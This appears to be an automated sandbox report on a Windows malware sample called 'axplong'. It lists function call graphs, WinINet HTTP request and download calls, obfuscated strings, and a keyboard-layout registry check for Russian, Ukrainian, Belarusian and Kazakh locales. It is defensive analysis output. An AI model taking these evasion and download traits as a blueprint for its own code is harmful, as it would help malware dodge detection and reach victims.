8bb7a3 Concurrency::details::_Reschedule_chore 12439->12443 12448 8bcaa7 12440->12448 12442 8bb794 12442->12443 12450 8bb74e 12442->12450 12443->12435 12456 8bb72b 12445->12456 12447 8a2c72 shared_ptr 12447->12438 12449 8bcac2 CreateThreadpoolWork 12448->12449 12449->12442 12451 8bb757 Concurrency::details::_Reschedule_chore 12450->12451 12454 8bccfc 12451->12454 12453 8bb771 12453->12443 12455 8bcd11 TpPostWork 12454->12455 12455->12453 12457 8bb737 12456->12457 12458 8bb747 12456->12458 12457->12458 12460 8bc9a8 12457->12460 12458->12447 12461 8bc9bd TpReleaseWork 12460->12461 12461->12458 12462 8d6559 12463 8d63f7 __cftof 2 API calls 12462->12463 12464 8d656a 12463->12464 12465 8bb85e 12466 8bb6e5 8 API calls 12465->12466 12467 8bb886 12466->12467 12468 8bb648 8 API calls 12467->12468 12469 8bb89f 12468->12469 12470 8d6974 12471 8d698c 12470->12471 12472 8d6982 12470->12472 12473 8d68bd 2 API calls 12471->12473 12474 8d69a6 ___free_lconv_mon 12473->12474 12057 8a86b0 12058 8a86b6 12057->12058 12059 8a86d6 12058->12059 12060 8d66e7 2 API calls 12058->12060 12061 8a86d0 12060->12061 12062 8adfd0 recv 12063 8ae032 recv 12062->12063 12064 8ae067 recv 12063->12064 12066 8ae0a1 12064->12066 12065 8ae1c3 12066->12065 12071 8bc5dc 12066->12071 12078 8bc382 12071->12078 12073 8ae1fe 12074 8bc19a 12073->12074 12075 8bc1c2 12074->12075 12076 8bc1a4 12074->12076 12075->12075 12076->12075 12095 8bc1c7 12076->12095 12079 8bc3d8 12078->12079 12081 8bc3aa 12078->12081 12079->12081 12084 8bce9b 12079->12084 12081->12073 12082 8bc42d __Xtime_diff_to_millis2 12082->12081 12083 8bce9b _xtime_get GetSystemTimePreciseAsFileTime 12082->12083 12083->12082 12085 8bceaa 12084->12085 12087 8bceb7 __aulldvrm 12084->12087 12085->12087 12088 8bce74 12085->12088 12087->12082 12091 8bcb1a 12088->12091 12092 8bcb2b GetSystemTimePreciseAsFileTime 12091->12092 12094 8bcb37 12091->12094 12092->12094 12094->12087 12098 8a2aa0 12095->12098 12097 8bc1de std::_Throw_future_error 12097->12076 12112 8bbe0f 12098->12112 12100 8a2abf 12100->12097 12101 8d8aaf __cftof 2 API calls 12102 8d6c26 12101->12102 12104 8d6c35 12102->12104 12105 8d6c43 12102->12105 12103 8a2ab4 12103->12100 12103->12101 12106 8d6c99 6 API calls 12104->12106 12107 8d68bd 2 API calls 12105->12107 12108 8d6c3f 12106->12108 12109 8d6c5d 12107->12109 12108->12097 12110 8d6c99 6 API calls 12109->12110 12111 8d6c71 ___free_lconv_mon 12109->12111 12110->12111 12111->12097 12115 8bcb61 12112->12115 12116 8bcb6f InitOnceExecuteOnce 12115->12116 12118 8bbe22 12115->12118 12116->12118 12118->12103 12356 8ae410 12357 8ae435 12356->12357 12359 8ae419 12356->12359 12359->12357 12360 8ae270 12359->12360 12361 8ae280 __dosmaperr 12360->12361 12362 8d8979 2 API calls 12361->12362 12363 8ae2bd std::_Xinvalid_argument 12362->12363 12364 8ae435 12363->12364 12365 8ae270 2 API calls 12363->12365 12364->12359 12365->12363 11953 8b1dd0 11956 8b1e6b shared_ptr __dosmaperr 11953->11956 11954 8ae440 5 API calls 11955 8b2936 shared_ptr std::_Xinvalid_argument 11954->11955 11956->11955 11963 8b1e78 11956->11963 11968 8d8979 11956->11968 11958 8b2265 shared_ptr 11958->11955 11958->11963 11972 8d66e7 11958->11972 11960 8b268b shared_ptr __dosmaperr 11960->11955 11961 8d8979 2 API calls 11960->11961 11962 8b2759 11961->11962 11962->11955 11962->11963 11964 8b27d1 11962->11964 11963->11954 11976 8ae440 11964->11976 11966 8b2843 11966->11955 11992 8a5df0 11966->11992 11969 8d8994 11968->11969 11999 8d86d7 11969->11999 11971 8d899e 11971->11958 11973 8d66f3 11972->11973 11974 8d66fd __cftof __dosmaperr 11973->11974 12023 8d6670 11973->12023 11974->11960 11977 8ae489 11976->11977 12046 8abd60 11977->12046 11979 8ae9a9 shared_ptr 11979->11966 11980 8ae711 11980->11979 11981 8ae440 5 API calls 11980->11981 11983 8af696 11981->11983 11982 8af892 shared_ptr 11982->11966 11983->11982 11984 8ae440 5 API calls 11983->11984 11986 8af973 11984->11986 11985 8afa45 shared_ptr 11985->11966 11986->11985 11987 8ae440 5 API calls 11986->11987 11989 8b054c 11987->11989 11988 8b0790 shared_ptr 11988->11966 11989->11988 11990 8ae440 5 API calls 11989->11990 11991 8b11f9 11990->11991 11994 8a5e28 11992->11994 11993 8a5f0e shared_ptr 11993->11955 11994->11993 11995 8a6060 RegOpenKeyExA 11994->11995 11996 8a645a shared_ptr 11995->11996 11998 8a60b3 __cftof 11995->11998 11996->11955 11997 8a6153 RegEnumValueW 11997->11998 11998->11996 11998->11997 12000 8d86e9 11999->12000 12001 8d683a __cftof 2 API calls 12000->12001 12004 8d86fe __cftof __dosmaperr 12000->12004 12003 8d872e 12001->12003 12003->12004 12005 8d8925 12003->12005 12004->11971 12006 8d8962 12005->12006 12007 8d8932 12005->12007 12016 8dd2e9 12006->12016 12008 8d8941 __fassign 12007->12008 12011 8dd30d 12007->12011 12008->12003 12012 8d683a __cftof 2 API calls 12011->12012 12013 8dd32a 12012->12013 12015 8dd33a 12013->12015 12020 8df07f 12013->12020 12015->12008 12017 8dd2f4 12016->12017 12018 8db4bb __cftof 2 API calls 12017->12018 12019 8dd304 12018->12019 12019->12008 12021 8d683a __cftof 2 API calls 12020->12021 12022 8df09f __cftof __fassign __freea 12021->12022 12022->12015 12024 8d6692 12023->12024 12026 8d667d __cftof __dosmaperr ___free_lconv_mon 12023->12026 12024->12026 12027 8d9ef9 12024->12027 12026->11974 12028 8d9f36 12027->12028 12029 8d9f11 12027->12029 12028->12026 12029->12028 12031 8e02f8 12029->12031 12032 8e0304 12031->12032 12034 8e030c __cftof __dosmaperr 12032->12034 12035 8e03ea 12032->12035 12034->12028 12036 8e040c 12035->12036 12038 8e0410 __cftof __dosmaperr 12035->12038 12036->12038 12039 8dfb7f 12036->12039 12038->12034 12040 8dfbcc 12039->12040 12041 8d683a __cftof 2 API calls 12040->12041 12045 8dfbdb __cftof 12041->12045 12042 8dd2e9 2 API calls 12042->12045 12043 8dc4ea GetPEB GetPEB __fassign 12043->12045 12044 8dfe7b 12044->12038 12045->12042 12045->12043 12045->12044 12047 8abdb2 12046->12047 12048 8ac14e shared_ptr 12046->12048 12047->12048 12049 8abdc6 InternetOpenW InternetConnectA 12047->12049 12048->11980 12050 8abe3d 12049->12050 12051 8abe53 HttpOpenRequestA 12050->12051 12052 8abe71 shared_ptr 12051->12052 12053 8abf13 HttpSendRequestA 12052->12053 12054 8abf2b shared_ptr 12053->12054 12055 8abfb3 InternetReadFile 12054->12055 12056 8abfda 12055->12056 12366 8b9310 12367 8b9325 12366->12367 12371 8b9363 12366->12371 12368 8bd041 SleepConditionVariableCS 12367->12368 12369 8b932f 12368->12369 12370 8bcff7 RtlWakeAllConditionVariable 12369->12370 12369->12371 12370->12371

                      Executed Functions

                      Function 008ABD60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310networkfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 760 8abd60-8abdac 761 8abdb2-8abdb6 760->761 762 8ac1a1-8ac1c6 call 8b7f30 760->762 761->762 764 8abdbc-8abdc0 761->764 767 8ac1c8-8ac1d4 762->767 768 8ac1f4-8ac20c 762->768 764->762 766 8abdc6-8abe4f InternetOpenW InternetConnectA call 8b7870 call 8a5b20 764->766 790 8abe53-8abe6f HttpOpenRequestA 766->790 791 8abe51 766->791 770 8ac1ea-8ac1f1 call 8bd593 767->770 771 8ac1d6-8ac1e4 767->771 772 8ac158-8ac170 768->772 773 8ac212-8ac21e 768->773 770->768 771->770 775 8ac26f-8ac274 call 8d6b9a 771->775 779 8ac243-8ac25f call 8bcf21 772->779 780 8ac176-8ac182 772->780 777 8ac14e-8ac155 call 8bd593 773->777 778 8ac224-8ac232 773->778 777->772 778->775 786 8ac234 778->786 787 8ac188-8ac196 780->787 788 8ac239-8ac240 call 8bd593 780->788 786->777 787->775 796 8ac19c 787->796 788->779 797 8abea0-8abf0f call 8b7870 call 8a5b20 call 8b7870 call 8a5b20 790->797 798 8abe71-8abe80 790->798 791->790 796->788 812 8abf13-8abf29 HttpSendRequestA 797->812 813 8abf11 797->813 800 8abe82-8abe90 798->800 801 8abe96-8abe9d call 8bd593 798->801 800->801 801->797 814 8abf5a-8abf82 812->814 815 8abf2b-8abf3a 812->815 813->812 818 8abfb3-8abfd4 InternetReadFile 814->818 819 8abf84-8abf93 814->819 816 8abf3c-8abf4a 815->816 817 8abf50-8abf57 call 8bd593 815->817 816->817 817->814 823 8abfda 818->823 821 8abfa9-8abfb0 call 8bd593 819->821 822 8abf95-8abfa3 819->822 821->818 822->821 826 8abfe0-8ac090 call 8d4180 823->826
                      APIs
                      • InternetOpenW.WININET(008F8D70,00000000,00000000,00000000,00000000), ref: 008ABDED
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 008ABE11
                      • HttpOpenRequestA.WININET(?,00000000), ref: 008ABE5A
                      • HttpSendRequestA.WININET(?,00000000), ref: 008ABF1B
                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 008ABFCC
                      • InternetCloseHandle.WININET(?), ref: 008AC0A7
                      • InternetCloseHandle.WININET(?), ref: 008AC0AF
                      • InternetCloseHandle.WININET(?), ref: 008AC0B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                      • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
                      • API String ID: 688256393-332458646
                      • Opcode ID: dd2f9ad110c5285c8975d98a8af2138303d0de4efa5ab8e756978adc32293b37
                      • Instruction ID: 0c098c422f4aef5f41d2e5f1912772770a49167ef17e31402c22cd07ac87dccd
                      • Opcode Fuzzy Hash: dd2f9ad110c5285c8975d98a8af2138303d0de4efa5ab8e756978adc32293b37
                      • Instruction Fuzzy Hash: E0B1D4B16001189BEB24CF28CC84BEDBB69FF86304F5041A9F509D7682DB759AC4CB95
                      Function 008B46C0 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2484COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 008B7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 008B795C
                        • Part of subcall function 008B7870: __Cnd_destroy_in_situ.LIBCPMT ref: 008B7968
                        • Part of subcall function 008B7870: __Mtx_destroy_in_situ.LIBCPMT ref: 008B7971
                        • Part of subcall function 008ABD60: InternetOpenW.WININET(008F8D70,00000000,00000000,00000000,00000000), ref: 008ABDED
                        • Part of subcall function 008ABD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 008ABE11
                        • Part of subcall function 008ABD60: HttpOpenRequestA.WININET(?,00000000), ref: 008ABE5A
                      • std::_Xinvalid_argument.LIBCPMT ref: 008B4EA2
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                      • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
                      • API String ID: 2414744145-1662704651
                      • Opcode ID: 7e11424dab21f708a95a7b654583955b76d899d0b0ad7a892f7b528c8a6bae63
                      • Instruction ID: c2cbcb7b2f367006717276ffb0129e6fea3fa8a45a726ff5b4391ae44fe3dfba
                      • Opcode Fuzzy Hash: 7e11424dab21f708a95a7b654583955b76d899d0b0ad7a892f7b528c8a6bae63
                      • Instruction Fuzzy Hash: F023F3719002589BEB19DB28CD897DDBB76EB85314F5481D8E008E73D2EB399F848F52
                      Function 008A5DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 915 8a5df0-8a5eee 921 8a5f18-8a5f25 call 8bcf21 915->921 922 8a5ef0-8a5efc 915->922 924 8a5f0e-8a5f15 call 8bd593 922->924 925 8a5efe-8a5f0c 922->925 924->921 925->924 927 8a5f26-8a60ad call 8d6b9a call 8be080 call 8b7f30 * 5 RegOpenKeyExA 925->927 944 8a6478-8a6481 927->944 945 8a60b3-8a6143 call 8d4020 927->945 947 8a64ae-8a64b7 944->947 948 8a6483-8a648e 944->948 971 8a6149-8a614d 945->971 972 8a6466-8a6472 945->972 949 8a64b9-8a64c4 947->949 950 8a64e4-8a64ed 947->950 952 8a6490-8a649e 948->952 953 8a64a4-8a64ab call 8bd593 948->953 954 8a64da-8a64e1 call 8bd593 949->954 955 8a64c6-8a64d4 949->955 956 8a651a-8a6523 950->956 957 8a64ef-8a64fa 950->957 952->953 958 8a659e-8a65a3 call 8d6b9a 952->958 953->947 954->950 955->954 955->958 965 8a654c-8a6555 956->965 966 8a6525-8a6530 956->966 962 8a64fc-8a650a 957->962 963 8a6510-8a6517 call 8bd593 957->963 962->958 962->963 963->956 968 8a6582-8a659d call 8bcf21 965->968 969 8a6557-8a6566 965->969 975 8a6542-8a6549 call 8bd593 966->975 976 8a6532-8a6540 966->976 978 8a6578-8a657f call 8bd593 969->978 979 8a6568-8a6576 969->979 980 8a6153-8a6187 RegEnumValueW 971->980 981 8a6460 971->981 972->944 975->965 976->958 976->975 978->968 979->958 979->978 986 8a644d-8a6454 980->986 987 8a618d-8a61ad 980->987 981->972 986->980 990 8a645a 986->990 992 8a61b0-8a61b9 987->992 990->981 992->992 993 8a61bb-8a624d call 8b7c50 call 8b8090 call 8b7870 * 2 call 8a5c60 992->993 993->986
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                      • API String ID: 0-3963862150
                      • Opcode ID: c07dadb6958895bcba2d39e7db51be66baf596a3f494e7ee1c9a855f8f008088
                      • Instruction ID: 4af57664cd010e03f77e134b62e35f05e730b55bf923185b25f07666e596ada3
                      • Opcode Fuzzy Hash: c07dadb6958895bcba2d39e7db51be66baf596a3f494e7ee1c9a855f8f008088
                      • Instruction Fuzzy Hash: 94E17C71900218ABEB24DBA4CC89BEEB779FF05300F5442D9E508E7691EB749BD48F52
                      Function 008A7D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1003 8a7d00-8a7d82 call 8d4020 1007 8a7d88-8a7db0 call 8b7870 call 8a5b20 1003->1007 1008 8a827e-8a829b call 8bcf21 1003->1008 1015 8a7db2 1007->1015 1016 8a7db4-8a7dd6 call 8b7870 call 8a5b20 1007->1016 1015->1016 1021 8a7dda-8a7df3 1016->1021 1022 8a7dd8 1016->1022 1025 8a7e24-8a7e4f 1021->1025 1026 8a7df5-8a7e04 1021->1026 1022->1021 1029 8a7e80-8a7ea1 1025->1029 1030 8a7e51-8a7e60 1025->1030 1027 8a7e1a-8a7e21 call 8bd593 1026->1027 1028 8a7e06-8a7e14 1026->1028 1027->1025 1028->1027 1033 8a829c call 8d6b9a 1028->1033 1031 8a7ea3-8a7ea5 GetNativeSystemInfo 1029->1031 1032 8a7ea7-8a7eac 1029->1032 1035 8a7e62-8a7e70 1030->1035 1036 8a7e76-8a7e7d call 8bd593 1030->1036 1037 8a7ead-8a7eb6 1031->1037 1032->1037 1044 8a82a1-8a82a6 call 8d6b9a 1033->1044 1035->1033 1035->1036 1036->1029 1042 8a7eb8-8a7ebf 1037->1042 1043 8a7ed4-8a7ed7 1037->1043 1046 8a8279 1042->1046 1047 8a7ec5-8a7ecf 1042->1047 1048 8a821f-8a8222 1043->1048 1049 8a7edd-8a7ee6 1043->1049 1046->1008 1051 8a8274 1047->1051 1048->1046 1054 8a8224-8a822d 1048->1054 1052 8a7ee8-8a7ef4 1049->1052 1053 8a7ef9-8a7efc 1049->1053 1051->1046 1052->1051 1056 8a81fc-8a81fe 1053->1056 1057 8a7f02-8a7f09 1053->1057 1058 8a822f-8a8233 1054->1058 1059 8a8254-8a8257 1054->1059 1062 8a820c-8a820f 1056->1062 1063 8a8200-8a820a 1056->1063 1064 8a7fe9-8a81e5 call 8b7870 call 8a5b20 call 8b7870 call 8a5b20 call 8a5c60 call 8b7870 call 8a5b20 call 8a5640 call 8b7870 call 8a5b20 call 8b7870 call 8a5b20 call 8a5c60 call 8b7870 call 8a5b20 call 8a5640 call 8b7870 call 8a5b20 call 8b7870 call 8a5b20 call 8a5c60 call 8b7870 call 8a5b20 call 8a5640 1057->1064 1065 8a7f0f-8a7f6b call 8b7870 call 8a5b20 call 8b7870 call 8a5b20 call 8a5c60 1057->1065 1066 8a8248-8a8252 1058->1066 1067 8a8235-8a823a 1058->1067 1060 8a8259-8a8263 1059->1060 1061 8a8265-8a8271 1059->1061 1060->1046 1061->1051 1062->1046 1069 8a8211-8a821d 1062->1069 1063->1051 1102 8a81eb-8a81f4 1064->1102 1088 8a7f70-8a7f77 1065->1088 1066->1046 1067->1066 1071 8a823c-8a8246 1067->1071 1069->1051 1071->1046 1090 8a7f7b-8a7f9b call 8d8a81 1088->1090 1091 8a7f79 1088->1091 1098 8a7f9d-8a7fac 1090->1098 1099 8a7fd2-8a7fd4 1090->1099 1091->1090 1103 8a7fae-8a7fbc 1098->1103 1104 8a7fc2-8a7fcf call 8bd593 1098->1104 1101 8a7fda-8a7fe4 1099->1101 1099->1102 1101->1102 1102->1048 1106 8a81f6 1102->1106 1103->1044 1103->1104 1104->1099 1106->1056
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008A7EA3
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                      • API String ID: 1721193555-2057465332
                      • Opcode ID: f8a8752e379325c66d066252697098d903cfb973f0653aea4146055b80007ee4
                      • Instruction ID: 05072a7377ce37f95c9f0c08355db5ec8d150e821e2f9b5f910d4a086ba32054
                      • Opcode Fuzzy Hash: f8a8752e379325c66d066252697098d903cfb973f0653aea4146055b80007ee4
                      • Instruction Fuzzy Hash: CCD1B670E04618DBEB14AB2CCD4A3AD7B61FB82324F944298E415E77D2DB354E9187D3
                      Function 008D6E01 Relevance: 4.6, APIs: 3, Instructions: 145COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1141 8d6e01-8d6e36 GetFileType 1142 8d6e3c-8d6e47 1141->1142 1143 8d6eee-8d6ef1 1141->1143 1144 8d6e69-8d6e85 call 8d4020 GetFileInformationByHandle 1142->1144 1145 8d6e49-8d6e5a call 8d7177 1142->1145 1146 8d6f1a-8d6f42 1143->1146 1147 8d6ef3-8d6ef6 1143->1147 1157 8d6f0b-8d6f18 call 8d740d 1144->1157 1158 8d6e8b-8d6ecd call 8d70c9 call 8d6f71 * 3 1144->1158 1161 8d6f07-8d6f09 1145->1161 1162 8d6e60-8d6e67 1145->1162 1148 8d6f5f-8d6f61 1146->1148 1149 8d6f44-8d6f57 1146->1149 1147->1146 1152 8d6ef8-8d6efa 1147->1152 1154 8d6f62-8d6f70 call 8bcf21 1148->1154 1149->1148 1168 8d6f59-8d6f5c 1149->1168 1156 8d6efc-8d6f01 call 8d7443 1152->1156 1152->1157 1156->1161 1157->1161 1177 8d6ed2-8d6eea call 8d7096 1158->1177 1161->1154 1162->1144 1168->1148 1177->1148 1180 8d6eec 1177->1180 1180->1161
                      APIs
                      • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 008D6E23
                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 008D6E7D
                      • __dosmaperr.LIBCMT ref: 008D6F12
                        • Part of subcall function 008D7177: __dosmaperr.LIBCMT ref: 008D71AC
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: File__dosmaperr$HandleInformationType
                      • String ID:
                      • API String ID: 2531987475-0
                      • Opcode ID: 71659d5a3ab1f88703cecfe36951666ccbada3051916307f71d4442411636cd2
                      • Instruction ID: a59e222599b1b1f25c4ca0d829ec1c1696179cdcc784af67a3b8f637bfabfdd0
                      • Opcode Fuzzy Hash: 71659d5a3ab1f88703cecfe36951666ccbada3051916307f71d4442411636cd2
                      • Instruction Fuzzy Hash: 96413C75900648AACB24DFB5E845DAFBBF9FF88300B10462EF556D3710EB30A954CB61
                      Function 008A82B0 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
